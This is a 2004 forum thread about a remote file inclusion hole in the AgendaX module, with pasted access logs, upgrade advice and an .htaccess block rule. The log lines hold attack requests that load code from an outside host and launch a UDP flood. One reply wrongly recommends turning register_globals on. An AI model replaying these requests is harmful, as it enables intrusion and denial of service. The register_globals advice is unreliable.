I was contacted by my network folks telling me of a udp flood attack. We traced to malicious code being run in agendax. It looks like this:

servecity.com:200.222.244.130 - - [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/
dev/null%20& HTTP/1.1" 200 1203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130
- - [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 1203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130
- - [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/
dev/null%20& HTTP/1.1" 200 1227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130
- - [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:22:28:32 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/
dev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"


I removed the mod for the moment. I did not find anything here. Anyone know anything?

--> Sorry, I found something deeper in the forum <--

Never mind

I confirm security problem with agendax

One membre of xoops-france was hacked by brasilian hackers.

The blamed file is addevent.inc.php,the variable $agendax_path of this script is obviously not checked

please don't post this on a public forum....
Some hackers are very happy with this.. they don't have to search anymore.

In fact you should remove or rename this file asap... and do some corrections in this file

Quote:

My sites not live yet, but other than renaming the file, since I don't have the skills to make any corrections, should I just disable agendax?

Mod still seems to work after renmaing the file.

The vulnerability described in above post affects only Agenda-X versions prior to 1.2.4

Solutions:
configure your PHP installation with register_global to ON
or download Agenda-x v1.2.4

The most recent version of Agenda-X is 2.1.1

---------
Chinese Web:http://www.wjue.org
English Web:http://www.guanxiCRM.com
Offshore IT Outsourcing:http://China-Offshore.com

I feel better now

Wow, You Gotta Stop Scaring Me.

My server just got comprised by this.

Is there a list maintained somewhere that people can check.

Just a simple list of module and version would be a start.

The site was running 1.2

I don't know of a list but you should check the individual home sites of 3rd party modules you are running.

Agendax had a serious security issue and was fixed a while ago.

You should be sure to set Register_Globals OFF. The issue was around calling the addevent.inc.php file directly in the URL. Easy enough to prevent.

I still get daily attempts at this but they still don't get in. To make double sure they don't I have an .htaccess file with this in it:

-------------------------------
php_value register_globals 0

<files addevent.inc.php>
Order Deny,Allow
Deny from all
</files>
-------------------------------